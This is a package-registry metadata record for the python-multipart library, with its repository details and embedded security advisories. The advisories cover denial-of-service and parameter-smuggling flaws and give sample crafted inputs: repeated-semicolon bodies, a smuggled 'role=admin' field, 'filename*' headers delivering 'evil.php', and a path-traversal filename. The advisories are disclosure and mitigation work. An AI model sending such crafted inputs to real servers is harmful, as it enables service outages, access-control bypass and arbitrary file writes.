{"id":2888490,"name":"python-multipart","ecosystem":"pypi","description":"A streaming multipart parser for Python","homepage":"https://github.com/Kludex/python-multipart","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/Kludex/python-multipart","keywords_array":[],"namespace":null,"versions_count":32,"first_release_published_at":"2013-03-26T00:49:56.000Z","latest_release_published_at":"2026-06-04T16:18:57.000Z","latest_release_number":"0.0.32","last_synced_at":"2026-06-17T07:00:26.564Z","created_at":"2022-04-10T12:21:20.184Z","updated_at":"2026-06-17T07:00:26.565Z","registry_url":"https://pypi.org/project/python-multipart/","install_command":"pip install python-multipart --index-url https://pypi.org/simple","documentation_url":"https://kludex.github.io/python-multipart/","metadata":{"funding":null,"documentation":"https://kludex.github.io/python-multipart/","classifiers":["Development Status :: 5 - Production/Stable","Environment :: Web Environment","Intended Audience :: Developers","License :: OSI Approved :: Apache Software License","Operating System :: OS Independent","Programming Language :: Python :: 3","Programming Language :: Python :: 3 :: Only","Programming Language :: Python :: 3.10","Programming Language :: Python :: 3.11","Programming Language :: Python :: 3.12","Programming Language :: Python :: 3.13","Programming Language :: Python :: 3.14","Topic :: Software Development :: Libraries :: Python Modules"],"normalized_name":"python-multipart","project_status":null},"repo_metadata":{"id":7657597,"uuid":"9018833","full_name":"Kludex/python-multipart","owner":"Kludex","description":"A streaming multipart parser for 
Python.","archived":false,"fork":false,"pushed_at":"2024-09-29T08:12:35.000Z","size":977,"stargazers_count":313,"open_issues_count":12,"forks_count":54,"subscribers_count":12,"default_branch":"master","last_synced_at":"2024-09-29T21:37:57.694Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"https://multipart.fastapiexpert.com/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kludex.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2013-03-25T23:50:12.000Z","updated_at":"2024-09-29T16:13:01.000Z","dependencies_parsed_at":"2024-01-22T12:53:27.968Z","dependency_job_id":"fc1cdb71-6e24-4300-a7bd-d68a910ccf21","html_url":"https://github.com/Kludex/python-multipart","commit_stats":{"total_commits":152,"total_committers":23,"mean_commits":6.608695652173913,"dds":0.6973684210526316,"last_synced_commit":"8b85d35fd79869766f678cbdc27bfaebe37b5527"},"previous_names":["kludex/python-multipart","andrew-d/python-multipart"],"tags_count":7,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kludex","download_url":"https://
codeload.github.com/Kludex/python-multipart/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":219877080,"owners_count":16554826,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Kludex","name":"Marcelo Trylesinski","uuid":"7353520","kind":"user","description":"Software Engineer @ Pydantic 🇧🇷🇺🇾🇮🇹\r\nUvicorn \u0026 Starlette maintainer 🦄🌟\r\nFastAPI Expert ⚡","email":"","website":"https://www.fastapiexpert.com/","location":"Utrecht, Netherlands","twitter":"marcelotryle","company":"@encode @pydantic","icon_url":"https://avatars.githubusercontent.com/u/7353520?u=62adc405ef418f4b6c8caa93d3eb8ab107bc4927\u0026v=4","repositories_count":193,"last_synced_at":"2024-05-20T14:06:26.952Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/Kludex","funding_links":["https://github.com/sponsors/Kludex"],"total_stars":4898,"followers":1576,"following":3,"created_at":"2022-11-14T06:44:58.525Z","updated_at":"2024-05-20T14:06:39.014Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kludex","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kludex/repositories"},"tags":[{"name":"0.0.9","sha":"3035c45b87a4a1bcb857e17f0ecbc4696ea75e47","kind":"commit","published_at":"2024-02-10T13:30:24.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.9","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposito
ries/Kludex%2Fpython-multipart/tags/0.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.9/manifests"},{"name":"0.0.8","sha":"8ce342cd9ac03fe238c24d68cffaf25a7ea0371a","kind":"commit","published_at":"2024-02-09T21:52:41.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.8","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.8/manifests"},{"name":"0.0.7","sha":"c83e6da1a3a6ed002ebb22138baa1664134d540c","kind":"commit","published_at":"2024-02-03T12:03:47.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.7","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.7/manifests"},{"name":"0.0.6","sha":"4ccfb3a0f20990c1ed682727262b2560707b81df","kind":"commit","published_at":"2023-02-27T16:37:18.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.6","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.6/manifests"},{"name":"0.0.5","sha":"f1a275e73763d16a9dba45e2bd568860302786bd","kind":"commit","published_at":"2018-10-12T08:24:19.000Z","down
load_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.5","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.5/manifests"},{"name":"0.0.4","sha":"e81dfcb954626e8d68a7b340d1e10bf585e491b4","kind":"commit","published_at":"2017-05-20T21:14:06.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.4","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.4/manifests"},{"name":"0.0.2","sha":"54b19103bea5427e3d2cbe65e406887005e4b54b","kind":"commit","published_at":"2013-11-09T07:24:48.000Z","download_url":"https://codeload.github.com/Kludex/python-multipart/tar.gz/0.0.2","html_url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kludex%2Fpython-multipart/tags/0.0.2/manifests"}]},"repo_metadata_updated_at":"2024-09-30T05:09:47.106Z","dependent_packages_count":703,"downloads":359610939,"downloads_period":"last-month","dependent_repos_count":12240,"rankings":{"downloads":0.11223066545734472,"dependent_repos_count":0.07888539134013704,"dependent_packages_count":0.04172922875239133,"stargazers_count":5.048447100797413,"forks_count":6.6945893854269345,"docker_downloads_count":0.46130804935862746,"av
erage":2.072864970188808},"purl":"pkg:pypi/python-multipart","advisories":[{"uuid":"GSA_kwCzR0hTQS01cnZxLWN4ajItNjR2Zs4ABYsU","url":"https://github.com/advisories/GHSA-5rvq-cxj2-64vf","title":"python-multipart: Quadratic-time querystring parsing with semicolon separators causes CPU denial of service","description":"### Summary\n\nWhen parsing `application/x-www-form-urlencoded` bodies, `QuerystringParser` located the field separator with a two step lookup: it first scanned the entire remaining buffer for `\u0026`, and only when no `\u0026` existed anywhere ahead did it fall back to scanning for `;`. For a body that uses `;` as the separator and contains no `\u0026`, every field iteration performed a full failed `\u0026` scan over the entire remaining buffer before locating the nearby `;`. With N semicolon separated fields in a chunk of size B, this yields O(B^2) byte comparisons per chunk.\n\nAn attacker can submit a small crafted body of the form `a;a;a;...` and cause the parser to spend seconds of CPU per request. A handful of concurrent requests can exhaust worker processes.\n\n### Details\n\nIn `python_multipart/multipart.py`, both the `FIELD_NAME` and `FIELD_DATA` states located the next separator like this:\n\n```python\nsep_pos = data.find(b\"\u0026\", i)\nif sep_pos == -1:\n    sep_pos = data.find(b\";\", i)\n```\n\n`data.find(b\"\u0026\", i)` scans from `i` to the end of the buffer and returns `-1` only when there is no `\u0026` anywhere in the remainder. For a `;` separated body with no `\u0026`, this failed full buffer scan repeats once per field, making parsing quadratic in the body length.\n\nFor example, a 1 MiB url encoded body consisting of `a;` repeated ~500,000 times, submitted with `Content-Type: application/x-www-form-urlencoded`, causes the parser to perform on the order of 10^11 byte comparisons, consuming several seconds of CPU for a single request. 
Cost scales quadratically with chunk size.\n\nThe parser is reachable through the public `QuerystringParser` class and through the high level `FormParser`, `create_form_parser`, and `parse_form` APIs for url encoded bodies. It is also the parser Starlette and FastAPI use for `application/x-www-form-urlencoded` request bodies via `request.form()`.\n\n### Impact\n\nUncontrolled CPU consumption (denial of service). Parsing is synchronous, so a single small crafted form body occupies the handling worker for seconds, blocking any other work on that worker until parsing finishes. Sustained concurrent requests keep workers continuously busy, degrading or denying service.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.30` or later, which treats only `\u0026` as a field separator (per the [WHATWG URL standard](https://url.spec.whatwg.org/#urlencoded-parsing)) using a single bounded scan, making parsing linear in the body length.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-15T20:24:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-5rvq-cxj2-64vf","https://github.com/advisories/GHSA-5rvq-cxj2-64vf"],"source_kind":"github","identifiers":["GHSA-5rvq-cxj2-64vf","CVE-2026-53539"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-15T21:00:08.604Z","updated_at":"2026-06-16T12:00:09.902Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01cnZxLWN4ajItNjR2Zs4ABYsU","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01cnZxLWN4ajItNjR2Zs4ABYsU","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.30","vulnerable_version_range":"\u003c 
0.0.30"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01cnZxLWN4ajItNjR2Zs4ABYsU/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12OXBnLTd4dm0tNjhoZs4ABYsT","url":"https://github.com/advisories/GHSA-v9pg-7xvm-68hf","title":"python-multipart: Negative Content-Length in parse_form buffers the entire body in memory","description":"### Summary\n\n`parse_form()` did not validate the `Content-Length` header before using it to bound its chunked read of the request body. A negative `Content-Length` turned the bounded read into a read-until-EOF, so the entire body was loaded into memory in a single read instead of in fixed-size chunks.\n\n### Details\n\n`parse_form()` reads the input stream in chunks, never reading more than the remaining `Content-Length` at a time. The per-chunk size is computed as `min(content_length - bytes_read, chunk_size)`. The header value was parsed to an integer without checking its sign, so a `Content-Length` of `-1` made this expression negative, and `input_stream.read(-1)` reads until end of stream. The intended bounded, chunked read therefore collapsed into a single unbounded read of the whole stream. The amount read is still bounded by what the client actually sends.\n\n### Impact\n\nThis only affects code that calls `parse_form()` directly with a `Content-Length` header taken from attacker-controlled input and without normalizing a negative value first. No known package is affected:\n\n* Starlette and FastAPI drive `MultipartParser` directly from the ASGI `receive()` stream and do not call `parse_form()`.\n* Known `parse_form()` consumers either do not forward `Content-Length` to it, recompute it from the already-read body, or run behind a layer (such as Werkzeug) that normalizes a negative `Content-Length` to `0`.\n\nThe realistic exposure is limited to bespoke WSGI or `http.server` handlers that forward raw client headers into `parse_form()`. 
In that case a crafted request buffers the body in memory at once, degrading availability under concurrent requests rather than causing a complete denial of service.\n\n### Mitigation\n\nUpgrade to version `0.0.31` or later, which rejects a negative `Content-Length` with a `ValueError` before reading the stream.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-06-15T20:23:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-v9pg-7xvm-68hf","https://github.com/advisories/GHSA-v9pg-7xvm-68hf"],"source_kind":"github","identifiers":["GHSA-v9pg-7xvm-68hf","CVE-2026-53540"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-15T21:00:08.604Z","updated_at":"2026-06-16T12:00:09.903Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OXBnLTd4dm0tNjhoZs4ABYsT","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12OXBnLTd4dm0tNjhoZs4ABYsT","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.31","vulnerable_version_range":"\u003c 0.0.31"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OXBnLTd4dm0tNjhoZs4ABYsT/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02anYzLTVmNTItNTk5bc4ABYsS","url":"https://github.com/advisories/GHSA-6jv3-5f52-599m","title":"python-multipart: Semicolon treated as querystring field separator enables parameter smuggling","description":"### Summary\n\n`QuerystringParser` treated `;` as a field separator in `application/x-www-form-urlencoded` bodies, in addition to `\u0026`. 
The [WHATWG URL standard](https://url.spec.whatwg.org/#urlencoded-parsing), modern browsers, and Python's `urllib.parse` (since the CVE-2021-23336 fix) treat only `\u0026` as a separator. This creates a parser differential: the same bytes are tokenized into different fields than a WHATWG compliant intermediary would produce, allowing an attacker to smuggle extra form fields past an upstream body inspecting component.\n\n### Details\n\nIn `python_multipart/multipart.py`, the `FIELD_NAME` and `FIELD_DATA` states located the next separator by scanning for `\u0026` and, failing that, for `;`:\n\n```python\nsep_pos = data.find(b\"\u0026\", i)\nif sep_pos == -1:\n    sep_pos = data.find(b\";\", i)\n```\n\nAs a result, `;` acted as a field boundary. Because the fallback only triggered when no `\u0026` remained in the current chunk, tokenization also depended on unrelated bytes later in the buffer and on how the body was split across `write()` calls. This is the same class of issue as CVE-2021-23336 in CPython's `urllib.parse`.\n\nFor example, a body inspecting WAF or gateway that follows the WHATWG rule (only `\u0026` separates fields) receives:\n\n```\nrole=user\u0026x=;role=admin\n```\n\nThe upstream parses two fields, `role=user` and `x=\";role=admin\"`, sees a benign `role=user`, and forwards the request. `QuerystringParser` parsed the same bytes as three fields: `role=\"user\"`, `x=\"\"`, and `role=\"admin\"`. The application (for example via Starlette/FastAPI `request.form()`, where the last value wins) then received `role=admin`, a value the upstream validator never saw.\n\nThe parser is reachable through the public `QuerystringParser` class, the high level `FormParser`, `create_form_parser`, and `parse_form` APIs, and Starlette/FastAPI `request.form()` for url encoded bodies.\n\n### Impact\n\nInterpretation conflict / HTTP parameter pollution. 
An attacker can smuggle extra or overriding form fields past an upstream component that applies the WHATWG separator rule, reaching the backend with parameters the intermediary did not observe.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.30` or later, which treats only `\u0026` as a field separator per the [WHATWG URL standard](https://url.spec.whatwg.org/#urlencoded-parsing). `;` is parsed as ordinary field data, matching `urllib.parse`, browsers, and other compliant parsers.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-06-15T20:22:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-6jv3-5f52-599m","https://github.com/advisories/GHSA-6jv3-5f52-599m"],"source_kind":"github","identifiers":["GHSA-6jv3-5f52-599m","CVE-2026-53538"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-15T21:00:08.604Z","updated_at":"2026-06-16T12:00:09.904Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02anYzLTVmNTItNTk5bc4ABYsS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02anYzLTVmNTItNTk5bc4ABYsS","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.30","vulnerable_version_range":"\u003c 0.0.30"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02anYzLTVmNTItNTk5bc4ABYsS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12ZmZ3LTkzd2YtNGo0cc4ABYsR","url":"https://github.com/advisories/GHSA-vffw-93wf-4j4q","title":"python-multipart: Content-Disposition parameter smuggling via RFC 2231/5987 extended parameters","description":"### Summary\n\n`parse_options_header` parsed `Content-Disposition` (and `Content-Type`) headers with 
[`email.message.Message`](https://docs.python.org/3/library/email.compat32-message.html#email.message.Message), which transparently applies [RFC 2231](https://datatracker.ietf.org/doc/html/rfc2231)/[5987](https://datatracker.ietf.org/doc/html/rfc5987) decoding. The extended parameter syntax (`filename*=charset'lang'value`, `name*=...`, and the `filename*0`/`filename*1` continuation form) is decoded and surfaced under the bare `filename`/`name` key, and overrides the plain parameter when both are present. [RFC 7578 §4.2](https://datatracker.ietf.org/doc/html/rfc7578#section-4.2) explicitly forbids the `filename*` form in `multipart/form-data`.\n\nComponents that follow RFC 7578, or that do not implement RFC 2231/5987 decoding for `multipart/form-data` (WAFs, proxies, gateways), may interpret such a header differently. An attacker can exploit that difference to smuggle a different field name or filename past an upstream inspector to the backend.\n\n### Details\n\nGiven both a plain and an extended parameter, the extended value won. For example:\n\n```\nContent-Disposition: form-data; name=\"comment\"; name*=utf-8''role\n```\n\nAn inspector following RFC 7578 sees the field `comment`, while the returned value was `name=role`. The same applies to filenames:\n\n```\nContent-Disposition: form-data; name=\"upload\"; filename=\"safe.txt\"; filename*=utf-8''evil.php\n```\n\nThe inspector sees `safe.txt`, while the returned value was `filename=evil.php`. 
Continuation parameters (`filename*0`, `filename*1`, and so on) were likewise reassembled into a `filename` invisible to a plain `filename=` match, and percent encoded sequences in the extended value were decoded (so `..%2F`, `%00`, and similar appeared in the returned filename).\n\nThis affects the high level `parse_options_header`, `FormParser`, `create_form_parser`, and `parse_form` APIs, and reaches Starlette/FastAPI through `request.form()`, where the smuggled value is exposed as the form field name or [`UploadFile.filename`](https://www.starlette.io/requests/#request-files).\n\n### Impact\n\nThis is an interpretation conflict ([CWE-436](https://cwe.mitre.org/data/definitions/436.html)) with other `multipart/form-data` parsers. An attacker able to submit `multipart/form-data` can present a different field name or filename to an upstream body inspecting component than the one delivered to the application. Concrete consequences depend on how the application uses these values, and may include bypassing a field name or filename based access/upload control, or, for an application that builds filesystem paths from the parsed filename without sanitization, path traversal via decoded `..%2F` sequences. Decoded control bytes such as `%00` can likewise cause confusion between an upstream validator and the backend. The `File` class applies `os.path.basename`, so file writing through it is not directly affected.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.30` or later, which ignores RFC 2231/5987 extended parameters (`name*`, `filename*`, and their continuations) so the plain `name`/`filename` parameter remains authoritative. 
RFC 7578 §4.2 forbids `filename*` for `multipart/form-data`; `name*` and the continuation forms are dropped for the same reason, since they are not valid `multipart/form-data` parameters either.","origin":"UNSPECIFIED","severity":"LOW","published_at":"2026-06-15T20:20:51.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":3.7,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-vffw-93wf-4j4q","https://github.com/advisories/GHSA-vffw-93wf-4j4q"],"source_kind":"github","identifiers":["GHSA-vffw-93wf-4j4q","CVE-2026-53537"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-15T21:00:08.604Z","updated_at":"2026-06-16T12:00:09.906Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZmZ3LTkzd2YtNGo0cc4ABYsR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12ZmZ3LTkzd2YtNGo0cc4ABYsR","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.30","vulnerable_version_range":"\u003c 0.0.30"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12ZmZ3LTkzd2YtNGo0cc4ABYsR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wcDZjLWdyNXctM2M1Z84ABWWU","url":"https://github.com/advisories/GHSA-pp6c-gr5w-3c5g","title":"python-multipart has Denial of Service via unbounded multipart part headers","description":"### Summary\n\n`python-multipart` has a denial of service vulnerability in multipart part header parsing. When parsing `multipart/form-data`, `MultipartParser` previously had no limit on the number of part headers or the size of an individual part header. 
An attacker could send a request with either many repeated headers without terminating the header block or a single very large header value, causing excessive CPU work before request rejection or completion.\n\n### Impact\n\nApplications that parse attacker-controlled `multipart/form-data` with affected versions of `python-multipart` can experience CPU exhaustion. ASGI applications using Starlette, FastAPI, or other frameworks that invoke `python-multipart` may have worker or event-loop delays while processing malicious upload requests.\n\n### Details\n\nThe affected parser states are `HEADER_FIELD_START`, `HEADER_FIELD`, `HEADER_VALUE_START`, `HEADER_VALUE`, and `HEADER_VALUE_ALMOST_DONE`. The issue can be triggered by:\n\n- A multipart part with an oversized individual header value.\n- A multipart part with many repeated header lines or an unterminated header block.\n\nBoth variants are addressed by enforcing default parser limits for maximum header count and maximum header size.\n\n### Mitigation\n\nUpgrade to `python-multipart` `0.0.27` or later.\n\nIf upgrading is not immediately possible, reduce exposure by enforcing request body size limits at the server, proxy, or framework layer. 
This is only a mitigation; affected versions of `python-multipart` still parse multipart part headers without the default header count and header size limits.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-06T21:56:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-pp6c-gr5w-3c5g","https://nvd.nist.gov/vuln/detail/CVE-2026-42561","https://github.com/advisories/GHSA-pp6c-gr5w-3c5g"],"source_kind":"github","identifiers":["GHSA-pp6c-gr5w-3c5g","CVE-2026-42561"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-06T22:00:07.920Z","updated_at":"2026-06-16T12:00:53.416Z","epss_percentage":0.00074,"epss_percentile":0.22549,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcDZjLWdyNXctM2M1Z84ABWWU","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wcDZjLWdyNXctM2M1Z84ABWWU","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.27","vulnerable_version_range":"\u003c 0.0.27"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wcDZjLWdyNXctM2M1Z84ABWWU/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tajg3LWh3cWgtNzNwas4ABVVk","url":"https://github.com/advisories/GHSA-mj87-hwqh-73pj","title":"python-multipart affected by Denial of Service via large multipart preamble or epilogue data","description":"### Summary\n\nA denial of service vulnerability exists when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections.\n\n### Details\n\nTwo inefficient multipart parsing paths could be abused with attacker-controlled input.\n\nBefore the first multipart boundary, the parser handled leading CR and LF bytes inefficiently while searching for the start of the first part. 
After the closing boundary, the parser continued processing trailing epilogue data instead of discarding it immediately. As a result, parsing time could grow with the size of crafted data placed before the first boundary or after the closing boundary.\n\n### Impact\n\nAn attacker can send oversized malformed multipart bodies that consume excessive CPU time during request parsing, reducing request-handling capacity and delaying legitimate requests. This issue degrades availability but does not typically result in a complete denial of service for the entire application.\n\n### Mitigation\n\nUpgrade to version `0.0.26` or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-15T19:45:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/Kludex/python-multipart/security/advisories/GHSA-mj87-hwqh-73pj","https://github.com/Kludex/python-multipart/releases/tag/0.0.26","https://nvd.nist.gov/vuln/detail/CVE-2026-40347","https://github.com/advisories/GHSA-mj87-hwqh-73pj"],"source_kind":"github","identifiers":["GHSA-mj87-hwqh-73pj","CVE-2026-40347"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-15T20:00:09.550Z","updated_at":"2026-06-14T01:01:05.222Z","epss_percentage":0.00022,"epss_percentile":0.06162,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tajg3LWh3cWgtNzNwas4ABVVk","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tajg3LWh3cWgtNzNwas4ABVVk","packages":[{"ecosystem":"pypi","package_name":"python-multipart","versions":[{"first_patched_version":"0.0.26","vulnerable_version_range":"\u003c 
0.0.26"}],"purl":"pkg:pypi/python-multipart"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tajg3LWh3cWgtNzNwas4ABVVk/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13cDUzLWo0d2otMmNmZ84ABRlg","url":"https://github.com/advisories/GHSA-wp53-j4wj-2cfg","title":"Python-Multipart has Arbitrary File Write via Non-Default Configuration","description":"### Summary\n\nA Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename.\n\n### Details\n\nWhen `UPLOAD_DIR` is set and `UPLOAD_KEEP_FILENAME` is `True`, the library constructs the file path using `os.path.join(file_dir, fname)`. Due to the behavior of `os.path.join()`, if the filename begins with a `/`, all preceding path components are discarded:\n\n```py\nos.path.join(\"/upload/dir\", \"/etc/malicious\") == \"/etc/malicious\"\n```\n\nThis allows an attacker to bypass the intended upload directory and write files to arbitrary paths.\n\n#### Affected Configuration\n\nProjects are only affected if all of the following are true:\n- `UPLOAD_DIR` is set\n- `UPLOAD_KEEP_FILENAME` is set to True\n- The uploaded file exceeds `MAX_MEMORY_FILE_SIZE` (triggering a flush to disk)\n\nThe default configuration is not vulnerable.
\n\n### Impact\n\nArbitrary file write to attacker-controlled paths on the filesystem.\n\n### Mitigation\n\nUpgrade to version 0.0.22, or avoid using `UPLOAD_KEEP_FILENAME=True` in project 
